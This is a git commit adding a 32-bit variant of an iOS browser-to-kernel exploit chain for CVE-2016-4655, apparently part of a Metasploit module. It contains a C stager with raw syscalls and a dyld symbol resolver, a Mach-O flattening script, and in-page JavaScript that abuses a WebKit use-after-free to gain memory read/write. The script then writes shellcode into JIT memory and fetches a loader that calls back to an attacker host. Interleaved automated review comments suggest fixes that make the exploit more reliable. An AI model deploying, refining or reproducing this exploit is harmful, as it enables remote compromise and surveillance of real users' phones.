initial commit of 32-bit trident exploit

Tim W 2018-10-10 16:25:38 +08:00
parent f2ebdd4cdf
commit 7fce2bd428
6 changed files with 4563 additions and 231 deletions


@ -1,11 +1,12 @@
#CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0 #CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0
CFLAGS_32=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0
GCC_BIN_OSX=`xcrun --sdk macosx -f gcc` GCC_BIN_OSX=`xcrun --sdk macosx -f gcc`
GCC_BIN_IOS=`xcrun --sdk iphoneos -f gcc` GCC_BIN_IOS=`xcrun --sdk iphoneos -f gcc`
GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS) GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS)
GCC_BASE_IOS=$(GCC_BIN_IOS) $(CFLAGS) GCC_BASE_IOS=$(GCC_BIN_IOS)
GCC_OSX=$(GCC_BASE_OSX) -arch x86_64 GCC_OSX=$(GCC_BASE_OSX) -arch x86_64
SDK_IOS=`xcrun --sdk iphoneos --show-sdk-path` SDK_IOS=`xcrun --sdk iphoneos --show-sdk-path`
GCC_IOS=$(GCC_BASE_IOS) -arch arm64 -isysroot $(SDK_IOS) \ GCC_IOS=$(GCC_BASE_IOS) $(CFLAGS) -arch arm64 -isysroot $(SDK_IOS) \
-Iheaders -framework CoreFoundation -framework Foundation -framework IOKit \ -Iheaders -framework CoreFoundation -framework Foundation -framework IOKit \
-I/Users/User/rsync/mettle/build/aarch64-iphone-darwin/include \ -I/Users/User/rsync/mettle/build/aarch64-iphone-darwin/include \
-I/Users/User/rsync/mettle/mettle/src \ -I/Users/User/rsync/mettle/mettle/src \
@ -13,7 +14,10 @@ GCC_IOS=$(GCC_BASE_IOS) -arch arm64 -isysroot $(SDK_IOS) \
-lmettle -lsigar -lev -lz -leio -ldnet -lcurl -lmbedx509 -lmbedtls -lmbedcrypto \ -lmettle -lsigar -lev -lz -leio -ldnet -lcurl -lmbedx509 -lmbedtls -lmbedcrypto \
-framework CoreVideo -framework CoreImage -framework CoreGraphics -framework CoreMedia -framework AVFoundation -framework UIKit -framework CoreVideo -framework CoreImage -framework CoreGraphics -framework CoreMedia -framework AVFoundation -framework UIKit
all: clean main_ios GCC_IOS_32=$(GCC_BASE_IOS) $(CFLAGS_32) -arch armv7 -isysroot $(SDK_IOS) \
-Iheaders
all: clean main_ios main_ios32
flatten: flatten-macho.m flatten: flatten-macho.m
$(GCC_OSX) -o $@ $^ $(GCC_OSX) -o $@ $^
@ -21,12 +25,21 @@ flatten: flatten-macho.m
main_ios: main.m exploit64.m find.m main.m nvpatch.m set.m main_ios: main.m exploit64.m find.m main.m nvpatch.m set.m
$(GCC_IOS) -o $@ $^ $(GCC_IOS) -o $@ $^
main_ios32: main32.c
$(GCC_IOS_32) -o $@ $^
main_ios32.bin: main_ios32
ruby create_bin.rb main_ios32
main_vm: flatten main_ios main_vm: flatten main_ios
./flatten main_ios main_vm ./flatten main_ios main_vm
install: main_vm install: main_vm
cp main_vm ../../../../data/exploits/CVE-2016-4655/exploit cp main_vm ../../../../data/exploits/CVE-2016-4655/exploit
clean: install32: main_ios32.bin
rm -f *.o main_ios main_vm flatten cp main_ios32.bin ../../../../data/exploits/CVE-2016-4655/exploit32
clean:
rm -f *.o main_ios main_ios32 main_vm flatten
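Review bot: The `clean` rule on the last line of the hunk removes `main_ios32` but not the `main_ios32.bin` that the new `main_ios32.bin: main_ios32` rule produces, so a stale flattened binary survives `make clean` and `install32` can copy an outdated artifact; change it to `rm -f *.o main_ios main_ios32 main_ios32.bin main_vm flatten`. `CFLAGS_32` also passes both `-Os` and `-O0`; the last optimisation flag wins, so `-Os` is a no-op here and one of the two should be dropped to make the intended level explicit (the commented-out `CFLAGS` line carries the same pair). The `main_ios32.bin` rule depends on `create_bin.rb` being present but does not list it as a prerequisite, so edits to the script do not trigger a rebuild; `main_ios32.bin: main_ios32 create_bin.rb` fixes that.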


@ -0,0 +1,52 @@
#!/usr/bin/env ruby
# -*- coding: binary -*-
require 'macho'
stager_file = ARGV[0]
data = File.binread(stager_file)
macho = MachO::MachOFile.new_from_bin(data)
main_func = macho[:LC_MAIN].first
entry_offset = main_func.entryoff
start = -1
min = -1
max = 0
for segment in macho.segments
next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO]
puts "segment: #{segment.segname} #{segment.vmaddr.to_s(16)}"
if min == -1 or min > segment.vmaddr
min = segment.vmaddr
end
if max < segment.vmaddr + segment.vmsize
max = segment.vmaddr + segment.vmsize
end
end
puts "data: #{min.to_s(16)} -> #{max.to_s(16)} #{(max - min).to_s(16)}"
output_data = "\x00" * (max - min)
for segment in macho.segments
#next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO]
puts "segment: #{segment.segname} off: #{segment.offset.to_s(16)} vmaddr: #{segment.vmaddr.to_s(16)} fileoff: #{segment.fileoff.to_s(16)}"
for section in segment.sections
puts "section: #{section.sectname} off: #{section.offset.to_s(16)} addr: #{section.addr.to_s(16)} size: #{section.size.to_s(16)}"
flat_addr = section.addr - min
section_data = data[section.offset, section.size]
#file_section = section.offset
#puts "info: #{segment.fileoff.to_s(16)} #{segment.offset.to_s(16)} #{section.size.to_s(16)} #{file_section.to_s(16)}"
#puts "?: #{data.size.to_s(16)} #{file_section.to_s(16)}"
if section_data
puts "flat_addr: #{flat_addr.to_s(16)} (#{section_data.size.to_s(16)})"
if start == -1 or start > flat_addr
start = flat_addr
end
output_data[flat_addr, section_data.size] = section_data
end
end
end
puts "start: #{start.to_s(16)}"
output_data = output_data[start..-1]
File.binwrite(stager_file + ".bin", output_data)
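Review bot: The section copy `section_data = data[section.offset, section.size]` does not distinguish zero-fill sections (`__bss`, `__common`) from file-backed ones; a Mach-O zero-fill section carries a file offset of 0, so the slice returns the first `size` bytes of the file — the Mach-O header — and writes them over the corresponding range of `output_data` instead of leaving it zeroed. Skip such sections before slicing, e.g. `next if section.flags & MachO::Sections::SECTION_FLAGS[:S_ZEROFILL] != 0` (or `section.flag?(:S_ZEROFILL)` if the installed ruby-macho provides it — verify against the gem version in use). A slice whose `offset + size` runs past `data.size` is also silently truncated; raising when `section_data.size != section.size` would surface a malformed input instead of producing a short image. `main_func` and `entry_offset` are computed but never used and can be removed, and the two `for` loops with `or` conditions read more idiomatically as `macho.segments.each do |segment| ... end` with `||`.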



@ -0,0 +1,241 @@
#include <stdio.h>
#include <string.h>
#include <mach-o/loader.h>
#include <mach-o/nlist.h>
#include <mach-o/dyld.h>
#include <mach/mach.h>
#include <dlfcn.h>
#include <asl.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/mman.h>
/*#define DEBUG 1*/
#if __aarch64__
typedef struct mach_header_64 mach_header_t;
typedef struct segment_command_64 segment_command_t;
typedef struct section_64 section_t;
typedef struct nlist_64 nlist_t;
#define MH_MAGIC_T MH_MAGIC_64
#define LC_SEGMENT_T LC_SEGMENT_64
#else
typedef struct mach_header mach_header_t;
typedef struct segment_command segment_command_t;
typedef struct section section_t;
typedef struct nlist nlist_t;
#define MH_MAGIC_T MH_MAGIC
#define LC_SEGMENT_T LC_SEGMENT
#endif
//https://github.com/opensource-apple/dyld/blob/master/configs/dyld.xcconfig - iOS 9.3.4
#ifdef __x86_64
#define DYLD_BASE_ADDRESS 0x7fff5fc00000
#elif __arm64
#define DYLD_BASE_ADDRESS 0x120000000
#elif __arm
#define DYLD_BASE_ADDRESS 0x1fe00000
#else
#endif
int string_compare(const char* s1, const char* s2);
long asm_syscall(const long syscall_number, const long arg1, const long arg2, const long arg3, const long arg4, const long arg5, const long arg6);
void resolve_dyld_symbol(void* base, void** dlopen_pointer, void** dlsym_pointer);
uint64_t syscall_chmod(uint64_t path, long mode);
uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer);
void init_exploit(void * dlsym_addr, void * dlopen_addr);
void init_main();
void init();
int main()
{
init();
}
void init()
{
void* dlopen_addr = 0;
void* dlsym_addr = 0;
uint64_t start = DYLD_BASE_ADDRESS;
/*if (sierra) {*/
/*}*/
uint64_t dyld = find_macho(start, 0x1000, 0);
resolve_dyld_symbol(dyld, &dlopen_addr, &dlsym_addr);
typedef void* (*dlopen_ptr)(const char *filename, int flags);
typedef void* (*dlsym_ptr)(void *handle, const char *symbol);
dlopen_ptr dlopen_func = dlopen_addr;
dlsym_ptr dlsym_func = dlsym_addr;
void* libsystem = dlopen_func("/usr/lib/libSystem.B.dylib", RTLD_NOW);
// Suspend threads
typedef mach_port_t (*mach_task_self_ptr)();
typedef thread_port_t (*mach_thread_self_ptr)();
typedef kern_return_t (*thread_suspend_ptr)(thread_act_t target_thread);
typedef kern_return_t (*task_threads_ptr)(task_t task, thread_act_array_t thread_list, mach_msg_type_number_t* thread_count);
void* libIOKit = dlopen_func("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_NOW);
mach_task_self_ptr mach_task_self_func = dlsym_func(libIOKit, "mach_task_self");
mach_thread_self_ptr mach_thread_self_func = dlsym_func(libIOKit, "mach_thread_self");
thread_suspend_ptr thread_suspend_func = dlsym_func(libsystem, "thread_suspend");
task_threads_ptr task_threads_func = dlsym_func(libsystem, "task_threads");
thread_act_t current_thread = mach_thread_self_func();
mach_msg_type_number_t thread_count;
thread_act_array_t thread_list;
kern_return_t result = task_threads_func(mach_task_self_func(), &thread_list, &thread_count);
if (!result && thread_count) {
for (unsigned int i = 0; i < thread_count; ++i) {
thread_act_t other_thread = thread_list[i];
if (other_thread != current_thread) {
thread_suspend_func(other_thread);
}
}
}
// Run exploit
init_exploit(dlsym_addr, dlopen_addr);
}
uint64_t syscall_chmod(uint64_t path, long mode)
{
return asm_syscall(15, path, mode, 0, 0, 0, 0);
}
long asm_syscall(const long syscall_number, const long arg1, const long arg2, const long arg3, const long arg4, const long arg5, const long arg6){
long ret;
#ifdef __x86_64
asm volatile (
"movq %1, %%rax\n\t"
"movq %2, %%rdi\n\t"
"movq %3, %%rsi\n\t"
"movq %4, %%rdx\n\t"
"movq %5, %%rcx\n\t"
"movq %6, %%r8\n\t"
"movq %7, %%r9\n\t"
"syscall"
: "=a"(ret)
: "g"(syscall_number), "g"(arg1), "g"(arg2), "g"(arg3), "g"(arg4), "g"(arg5), "g"(arg6) );
#elif __arm__
volatile register uint32_t r12 asm("r12") = syscall_number;
volatile register uint32_t r0 asm("r0") = arg1;
volatile register uint32_t r1 asm("r1") = arg2;
volatile register uint32_t r2 asm("r2") = arg3;
volatile register uint32_t r3 asm("r3") = arg4;
volatile register uint32_t r4 asm("r4") = arg5;
volatile register uint32_t r5 asm("r5") = arg6;
volatile register uint32_t xret asm("r0");
asm volatile (
"mov r0, %2\n"
"mov r1, %3\n"
"mov r2, %4\n"
"mov r3, %5\n"
"mov r4, %6\n"
"mov r5, %7\n"
"mov r12, %1\n"
"swi 0x80\n"
"mov %0, r0\n"
: "=r"(xret)
: "r"(r12), "r"(r0), "r"(r1), "r"(r2), "r"(r3), "r"(r4), "r"(r5)
: "r0", "r1", "r2", "r3", "r4", "r5", "r12");
ret = xret;
#elif __aarch64__
// : ¯\_(ツ)_/¯
volatile register uint64_t x16 asm("x16") = syscall_number;
volatile register uint64_t x0 asm("x0") = arg1;
volatile register uint64_t x1 asm("x1") = arg2;
volatile register uint64_t x2 asm("x2") = arg3;
volatile register uint64_t x3 asm("x3") = arg4;
volatile register uint64_t x4 asm("x4") = arg5;
volatile register uint64_t x5 asm("x5") = arg6;
volatile register uint64_t xret asm("x0");
asm volatile (
"mov x0, %2\n\t"
"mov x1, %3\n\t"
"mov x2, %4\n\t"
"mov x3, %5\n\t"
"mov x4, %6\n\t"
"mov x5, %7\n\t"
"mov x16, %1\n\t"
"svc 0x80\n\t"
"mov %0, x0\n\t"
: "=r"(xret)
: "r"(x16), "r"(x0), "r"(x1), "r"(x2), "r"(x3), "r"(x4), "r"(x5)
: "x0", "x1", "x2", "x3", "x4", "x5", "x16");
ret = xret;
#endif
return ret;
}
int string_compare(const char* s1, const char* s2)
{
while (*s1 != '\0' && *s1 == *s2)
{
s1++;
s2++;
}
return (*(unsigned char *) s1) - (*(unsigned char *) s2);
}
uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer)
{
while(1) {
uint64_t ptr = addr;
if (pointer) {
ptr = *(uint64_t *)ptr;
}
unsigned long ret = syscall_chmod(ptr, 0777);
if (ret == 0x2 && ((int *)ptr)[0] == MH_MAGIC_T) {
return ptr;
}
addr += increment;
}
return 0;
}
// Credits: http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html
void resolve_dyld_symbol(void* base, void** dlopen_pointer, void** dlsym_pointer)
{
struct load_command* lc;
segment_command_t* sc;
segment_command_t* data;
section_t* data_const = 0;
lc = (struct load_command*)(base + sizeof(mach_header_t));
for (int i=0;i<((mach_header_t*)base)->ncmds; i++) {
if (lc->cmd == LC_SEGMENT_T) {
sc = (struct segment_command*)lc;
if (string_compare(sc->segname, "__DATA") == 0) {
data = (struct segment_command*)lc;
break;
}
}
lc = (struct load_command *)((unsigned long)lc + lc->cmdsize);
}
data_const = data + 1;
for (int i=0; i<data->nsects; i++,data_const++) {
if (string_compare(data_const->sectname, "__const") == 0) {
break;
}
}
void **dataConst = base + data_const->offset;
while (!*dlopen_pointer || !*dlsym_pointer) {
if (string_compare((char*)(dataConst[0]), "__dyld_dlopen") == 0) {
*dlopen_pointer = (void*)dataConst[1];
}
if (string_compare((char*)(dataConst[0]), "__dyld_dlsym") == 0) {
*dlsym_pointer = (void*)dataConst[1];
}
dataConst += 2;
}
}
#include "exploit32.c"
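Review bot: `find_macho` works on `uint64_t` addresses and `init` hands its result to `resolve_dyld_symbol(void* base, ...)` without a cast, while `find_macho` itself dereferences it as `*(uint64_t *)ptr` and `((int *)ptr)[0]`; the Makefile compiles this file with `-arch armv7`, where that is a 64-bit integer narrowed to a 32-bit pointer and the `pointer` branch would read 8 bytes where a pointer-sized read is meant. Declare `start`, `dyld`, `addr`, `ptr` and the `path` parameter of `syscall_chmod` as `uintptr_t` and read through `*(uintptr_t *)ptr`, so the same source is type-correct on both widths. In `resolve_dyld_symbol`, `sc` and `data` are declared `segment_command_t*` but assigned through `(struct segment_command*)` casts, which is an incompatible-pointer assignment under `__aarch64__`; cast to `segment_command_t*` instead. The `return 0;` after `while(1)` in `find_macho` is unreachable and should be dropped, or the loop given a bound so the return is meaningful.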


@ -1,10 +0,0 @@
#!/bin/bash
make clean
rsync -azPr -e "ssh -p2222" --delete . localhost:rsync/cve/
ssh -p2222 localhost "bash -l -c 'cd rsync/cve && make main_vm' && echo Done!"
rsync -azPr -e "ssh -p2222" --delete localhost:rsync/cve/ .
ls -l main_vm
cp main_vm ../../../../data/exploits/CVE-2016-4655/exploit


@ -34,6 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
['URL', 'https://github.com/Siguza/PhoenixNonce'], ['URL', 'https://github.com/Siguza/PhoenixNonce'],
['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'], ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'],
['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'], ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'],
['URL', 'https://github.com/benjamin-42/Trident'],
['URL', 'http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html'],
], ],
'Arch' => ARCH_AARCH64, 'Arch' => ARCH_AARCH64,
'Platform' => 'apple_ios', 'Platform' => 'apple_ios',
@ -50,13 +52,19 @@ class MetasploitModule < Msf::Exploit::Remote
def on_request_uri(cli, request) def on_request_uri(cli, request)
print_status("Request from #{request['User-Agent']}") print_status("Request from #{request['User-Agent']}")
if request.uri =~ %r{/loader$} if request.uri =~ %r{/loader32$}
print_good("Target is vulnerable.") print_good("armle target is vulnerable.")
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit32" )
loader_data = File.read(local_file, {:mode => 'rb'})
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
return
elsif request.uri =~ %r{/loader64$}
print_good("aarch64 target is vulnerable.")
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" ) local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" )
loader_data = File.read(local_file, {:mode => 'rb'}) loader_data = File.read(local_file, {:mode => 'rb'})
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
return return
elsif request.uri =~ %r{/exploit$} elsif request.uri =~ %r{/exploit64$}
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" ) local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
loader_data = File.read(local_file, {:mode => 'rb'}) loader_data = File.read(local_file, {:mode => 'rb'})
payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}" payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
@ -70,76 +78,156 @@ class MetasploitModule < Msf::Exploit::Remote
<html> <html>
<body> <body>
<script> <script>
function load_binary_resource(url) {
function load_binary_resource(url) {
var req = new XMLHttpRequest(); var req = new XMLHttpRequest();
req.open('GET', url, false); req.open('GET', url, false);
req.overrideMimeType('text/plain; charset=x-user-defined'); req.overrideMimeType('text/plain; charset=x-user-defined');
req.send(null); req.send(null);
return req.responseText; return req.responseText;
} }
var mem0 = 0;
var mem1 = 0;
var mem2 = 0;
function read4(addr) { var pressure = new Array(400);
mem0[4] = addr; var bufs = new Array(10000);
var ret = mem2[0];
mem0[4] = mem1;
return ret;
}
function write4(addr, val) { var fcp = 0;
mem0[4] = addr; var smsh = new Uint32Array(0x10);
mem2[0] = val;
mem0[4] = mem1; var trycatch = "";
} for(var z=0; z<0x4000; z++) trycatch += "try{} catch(e){}; ";
filestream = load_binary_resource("exploit") var fc = new Function(trycatch);
var shll = new Uint32Array(filestream.length / 4);
for (var i = 0; i < filestream.length;) { function dgc() {
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
shll[i / 4] = word;
i += 4;
}
_dview = null;
function u2d(low, hi) {
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
_dview.setUint32(0, hi);
_dview.setUint32(4, low);
return _dview.getFloat64(0);
}
var pressure = new Array(100);
var bufs = new Array(10000);
dgc = function() {
for (var i = 0; i < pressure.length; i++) { for (var i = 0; i < pressure.length; i++) {
pressure[i] = new Uint32Array(0x10000); pressure[i] = new Uint32Array(0xa000);
} }
for (var i = 0; i < pressure.length; i++) { for (var i = 0; i < pressure.length; i++) {
pressure[i] = 0; pressure[i] = 0
}
} }
}
function swag() {
if(bufs[0]) return;
function swag() {
if (bufs[0]) return;
for (var i = 0; i < 4; i++) {
dgc(); dgc();
}
for (i = 0; i < bufs.length; i++) { for (i=0; i < bufs.length; i++) {
bufs[i] = new Uint32Array(0x100 * 2) bufs[i] = new Uint32Array(0x100*2)
for (k = 0; k < bufs[i].length;) { for (k=0; k < bufs[i].length; )
{
bufs[i][k++] = 0x41414141; bufs[i][k++] = 0x41414141;
bufs[i][k++] = 0xffff0000; bufs[i][k++] = 0xffff0000;
} }
} }
} }
var trycatch = "";
for (var z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; ";
var fc = new Function(trycatch);
var fcp = 0;
var smsh = new Uint32Array(0x10)
function smashed(stl) { var mem0=0;
document.body.innerHTML = ""; var mem1=0;
var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]); var mem2=0;
function read4(addr) {
mem0[4] = addr;
var ret = mem2[0];
mem0[4] = mem1;
return ret;
}
function write4(addr, val) {
mem0[4] = addr;
mem2[0] = val;
mem0[4] = mem1;
}
_dview = null;
function u2d(low, hi) {
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
_dview.setUint32(0, hi);
_dview.setUint32(4, low);
return _dview.getFloat64(0);
}
function go_(){
var arr = new Array(0x100);
var not_number = {};
not_number.toString = function() {
arr = null;
props["stale"]["value"] = null;
swag();
return 10;
};
smsh[0] = 0x21212121;
smsh[1] = 0x31313131;
smsh[2] = 0x41414141;
smsh[3] = 0x51515151;
smsh[4] = 0x61616161;
smsh[5] = 0x71717171;
smsh[6] = 0x81818181;
smsh[7] = 0x91919191;
var props = {
p0 : { value : 0 },
p1 : { value : 1 },
p2 : { value : 2 },
p3 : { value : 3 },
p4 : { value : 4 },
p5 : { value : 5 },
p6 : { value : 6 },
p7 : { value : 7 },
p8 : { value : 8 },
length : { value : not_number },
stale : { value : arr },
after : { value : 666 }
};
var target = [];
var stale = 0;
var before_len = arr.length;
Object.defineProperties(target, props);
stale = target.stale;
if (stale.length != 0x41414141){
location.reload();
return;
}
var obuf = new Uint32Array(2);
obuf[0] = 0x41414141;
obuf[1] = 0xffff0000;
stale[0] = 0x12345678;
stale[1] = {};
for(var z=0; z<0x100; z++) fc();
for (i=0; i < bufs.length; i++) {
var dobreak = 0;
for (k=0; k < bufs[0].length; k++) {
if (bufs[i][k] == 0x12345678) {
if (bufs[i][k+1] == 0xFFFF0000) {
stale[0] = fc;
fcp = bufs[i][k];
stale[0] = {
'a': u2d(105, 0),
'b': u2d(0, 0),
'c': smsh,
'd': u2d(0x100, 0)
}
stale[1] = stale[0]
bufs[i][k] += 0x10;
bck = stale[0][4];
stale[0][4] = 0;
stale[0][6] = 0xffffffff;
mem0 = stale[0];
mem1 = bck;
mem2 = smsh;
bufs.push(stale)
if (smsh.length != 0x10) {
var filestream = load_binary_resource("loader64");
var macho = load_binary_resource("exploit64");
r2 = smsh[(fcp+0x18)/4];
r3 = smsh[(r2+0x10)/4];
var jitf = smsh[(r3+0x10)/4];
write4(jitf, 0xd28024d0); //movz x16, 0x126 write4(jitf, 0xd28024d0); //movz x16, 0x126
write4(jitf + 4, 0x58000060); //ldr x0, 0x100007ee4 write4(jitf + 4, 0x58000060); //ldr x0, 0x100007ee4
write4(jitf + 8, 0xd4001001); //svc 80 write4(jitf + 8, 0xd4001001); //svc 80
@ -172,7 +260,6 @@ class MetasploitModule < Msf::Exploit::Remote
} }
} }
var shc = jitf; var shc = jitf;
var filestream = load_binary_resource("loader")
for (var i = 0; i < filestream.length;) { for (var i = 0; i < filestream.length;) {
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24); var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
write4(shc, word); write4(shc, word);
@ -184,8 +271,9 @@ class MetasploitModule < Msf::Exploit::Remote
write4(shc, jitf); write4(shc, jitf);
write4(shc + 4, 1); write4(shc + 4, 1);
// copy macho // copy macho
for (var i = 0; i < shll.length; i++) { for (var i = 0; i < macho.length;i+=4) {
write4(jitf + i * 4, shll[i]); var word = (macho.charCodeAt(i) & 0xff) | ((macho.charCodeAt(i + 1) & 0xff) << 8) | ((macho.charCodeAt(i + 2) & 0xff) << 16) | ((macho.charCodeAt(i + 3) & 0xff) << 24);
write4(jitf+i, word);
} }
for (var i = 0; i < bss.length; i++) { for (var i = 0; i < bss.length; i++) {
for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) { for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {
@ -194,104 +282,68 @@ class MetasploitModule < Msf::Exploit::Remote
} }
fc(); fc();
} }
} else if(bufs[i][k+1] == 0xFFFFFFFF) {
function go_() {
if (smsh.length != 0x10) {
smashed();
return;
}
dgc();
var arr = new Array(0x100);
var yolo = new ArrayBuffer(0x1000);
arr[0] = yolo;
arr[1] = 0x13371337;
var not_number = {};
not_number.toString = function() {
arr = null;
props["stale"]["value"] = null;
swag();
return 10;
};
var props = {
p0: {
value: 0
},
p1: {
value: 1
},
p2: {
value: 2
},
p3: {
value: 3
},
p4: {
value: 4
},
p5: {
value: 5
},
p6: {
value: 6
},
p7: {
value: 7
},
p8: {
value: 8
},
length: {
value: not_number
},
stale: {
value: arr
},
after: {
value: 666
}
};
var target = [];
var stale = 0;
Object.defineProperties(target, props);
stale = target.stale;
stale[0] += 0x101;
stale[1] = {}
for (var z = 0; z < 0x1000; z++) fc();
for (i = 0; i < bufs.length; i++) {
for (k = 0; k < bufs[0].length; k++) {
if (bufs[i][k] == 0x41414242) {
stale[0] = fc; stale[0] = fc;
fcp = bufs[i][k]; fcp = bufs[i][k];
stale[0] = { stale[0] = smsh;
'a': u2d(105, 0), stale[2] = {'a':u2d(0x2,0x10),'b':smsh, 'c':u2d(0,0), 'd':u2d(0,0)}
'b': u2d(0, 0), stale[0] = {'a':u2d(0,0x00e00600),'b':u2d(1,0x10), 'c':u2d(bufs[i][k+2*2]+0x10,0), 'd':u2d(0,0)}
'c': smsh, stale[1] = stale[0];
'd': u2d(0x100, 0) bufs[i][k] += 0x10;
} var leak = stale[0][0].charCodeAt(0);
stale[1] = stale[0] leak += stale[0][1].charCodeAt(0) << 8;
bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh leak += stale[0][2].charCodeAt(0) << 16;
bck = stale[0][4]; leak += stale[0][3].charCodeAt(0) << 24;
stale[0][4] = 0; // address, low 32 bits bufs[i][k] -= 0x10;
// stale[0][5] = 1; // address, high 32 bits == 0x100000000 stale[0] = {'a':u2d(leak,0x00602300), 'b':u2d(0,0), 'c':smsh, 'd':u2d(0,0)}
stale[0][6] = 0xffffffff; stale[1] = stale[0];
bufs[i][k] += 0x10;
stale[0][4] = 0;
stale[0][5] = 0xffffffff;
bufs[i][k] -= 0x10;
mem0 = stale[0]; mem0 = stale[0];
mem1 = bck;
mem2 = smsh; mem2 = smsh;
bufs.push(stale)
if (smsh.length != 0x10) { if (smsh.length != 0x10) {
smashed(stale[0]);
}
return;
}
}
}
setTimeout(function() { setTimeout(function() {
document.location.reload(); var filestream = load_binary_resource("loader32");
}, 2000); r2 = smsh[(fcp+0x14)/4];
r3 = smsh[(r2+0x10)/4];
shellcode = (smsh[(r3+0x14)/4]&0xfffff000)-0x10000;
smsh[shellcode/4] = 0;
shellcode += 4;
smsh[shellcode/4] = 0;
shellcode += 4;
smsh[shellcode/4] = 0;
shellcode += 4;
smsh[shellcode/4] = 0;
shellcode += 4;
for(var i = 0; i < filestream.length; i+=4) {
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i+1) & 0xff) << 8) | ((filestream.charCodeAt(i+2) & 0xff) << 16) | ((filestream.charCodeAt(i+3) & 0xff) << 24);
smsh[(shellcode+i)/4] = word;
} }
smsh[(fcp+0x00)/4] = fcp+4;
smsh[(fcp+0x04)/4] = fcp+4;
smsh[(fcp+0x08)/4] = shellcode+1; //PC
smsh[(fcp+0x30)/4] = fcp+0x30+4-0x18-0x34+0x8;
fc();
}, 100);
}
} else {
location.reload();
}
dobreak = 1;
break;
}
}
if (dobreak) break;
}
location.reload();
}
setTimeout(go_, 300);
dgc();
setTimeout(go_, 200);
</script> </script>
</body> </body>
</html> </html>